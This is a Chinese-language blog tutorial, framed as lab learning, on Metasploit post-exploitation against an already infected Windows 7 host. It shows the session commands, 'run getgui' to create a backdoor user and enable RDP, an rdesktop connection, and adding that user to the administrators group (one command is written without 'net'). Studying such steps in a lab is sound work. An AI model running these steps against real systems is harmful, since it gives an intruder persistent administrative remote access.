课前声明:
1、本分享仅做学习交流,请自觉遵守法律法规!
2、搜索:Kali与编程,学习更多网络攻防干货!
一、背景介绍
在我们日常使用Kali Linux时,我们通常在进行模拟攻防演练的时候,我们如何拿下目标主机最高权限呢(例如利用病毒拿下Win7主机),怎样在受害者主机进行随意操作呢?如何进行文件下载以及文件上传呢?如何解决上述问题呢?接下来让我们一起学习!
二、资源装备
1.安装好Kali Linux的虚拟机一台;
2.已经被控制的Windows主机一个;
3.整装待发的小白一个。
三、战略安排
3.1 查看kali虚拟机sessions状况,如下图所示。
命令:sessions
![dea828cbe09636879a74d4d90c4ea6a2.png](https://i-blog.csdnimg.cn/blog_migrate/8be27bf89cd88c816dc8631493acef87.png)
3.2 在受害者主机执行病毒文件,如下图所示。
步骤:双击如下图所示的文件
![ba194ade53c9dbeabe38f5994df36c13.png](https://i-blog.csdnimg.cn/blog_migrate/f072b393780294a0376fc0f060c343a7.png)
3.3 再次在Kali Linux中执行sessions命令,如下图所示。
命令:sessions
![79b36191e86aa68f5eb0d7fd692b7f7c.png](https://i-blog.csdnimg.cn/blog_migrate/cc9a8a1d2038b7536b44d57c62399e1d.png)
3.4 执行命令,给受害者主机创建用户,如下图所示。
命令:sessions -i 5
r
un getgui -u 用户名 -p 密码
Eg:
run
getgui -u hacker -p 123456
![08696dacd576c2b43b6281cf2808acbc.png](https://i-blog.csdnimg.cn/blog_migrate/5849ee42f93eca88b42988b10bf11bae.png)
3.5 执行getgui脚本文件,开启受害者主机3389端口(远程桌面连接端口),如下图所示。
命令:
run getgui -e
![bd9a70aa263dbcdfdf4714e2447467d5.png](https://i-blog.csdnimg.cn/blog_migrate/fbaef2678517a290fe81954d57aca3d4.png)
3.5.1 执行结果如下图所示。
![48bca0d4a35733626644ed810971da44.png](https://i-blog.csdnimg.cn/blog_migrate/ff567ec3dea4f56ff3a5ad240e87dda1.png)
3.6 查看受害者主机的ip地址,如下图所示。
命令:
ipconfig
![6a534334e2179542f6d1fe2c47ea56c3.png](https://i-blog.csdnimg.cn/blog_migrate/68923d326908a03aa8b867ef49271755.png)
3.7 连接受害者主机的远程桌面,如下图所示。
命令:
rdesktop 192.168.0.107:3389
![f4a25d9aee728d8b1492baab008f6dc3.png](https://i-blog.csdnimg.cn/blog_migrate/944ce8a89e3c27b0f453aba4b98f6eae.png)
3.7.1 登录窗口如下图所示,根据创建的用户进行登录。
![198b8d9cff31fe816fc03ea23cefa84a.png](https://i-blog.csdnimg.cn/blog_migrate/3d171f44cf2ff0ed27aca3dfca48554f.png)
3.8 遇到创建的用户不是管理员组用户的问题,如下图所示。
![f34de6b0d06500cb479658c5f724e38c.png](https://i-blog.csdnimg.cn/blog_migrate/0305a78ef90253d811e7b16242e7c1b0.png)
3.9 解决升级管理员权限的问题。
3.9.1 启动dos窗口
命令:shell
![2d124e9bc3b3e80799bbb3977205abd2.png](https://i-blog.csdnimg.cn/blog_migrate/c45cb1361b37568f1d9968a2670a4e8e.png)
3.9.2 升级管理员用户,如下图所示。
命令:localgroup administrators 用户名 /add
Eg :localgroup administrators hacker /add
![d88366bf810d66f5c2a38ac7fcacf8a4.png](https://i-blog.csdnimg.cn/blog_migrate/add8a6a55d12fe4c82e6f28ea722565a.png)
3.9.3 解决乱码问题,如下图所示。
命令:chcp 65001
![6dbb042ec3dfbd2fb6050a2e49020fe8.png](https://i-blog.csdnimg.cn/blog_migrate/6ac6bc9f8518be4aecd6ac6a8111e952.png)
3.10 继续登录,如下图所示。
3.10.1 登录界面
![2ddb7a58aca8fe26b8e7c7da534e5df4.png](https://i-blog.csdnimg.cn/blog_migrate/75ab49265795ce1a58f0088f5c1d52e6.png)
3
.10.2 选择是
![a1000866c81578bc364a85853046a04a.png](https://i-blog.csdnimg.cn/blog_migrate/8a629a9a5b34d6ccfe8038029f4ca1d1.png)
3.11 渗透成功,如下图所示。
辛苦原创,各位看官记得好评加关注哦!你也可搜索:Kali与编程,学习更多Kali Linux渗透与白帽编程技巧哦!